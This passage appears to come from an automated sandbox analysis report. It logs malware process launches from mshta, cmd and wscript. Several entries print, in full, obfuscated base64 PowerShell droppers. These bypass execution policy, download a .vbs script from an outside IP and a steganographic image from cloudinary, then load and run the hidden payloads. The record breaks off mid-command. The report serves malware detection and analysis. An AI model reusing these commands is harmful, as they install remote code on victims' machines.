
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIk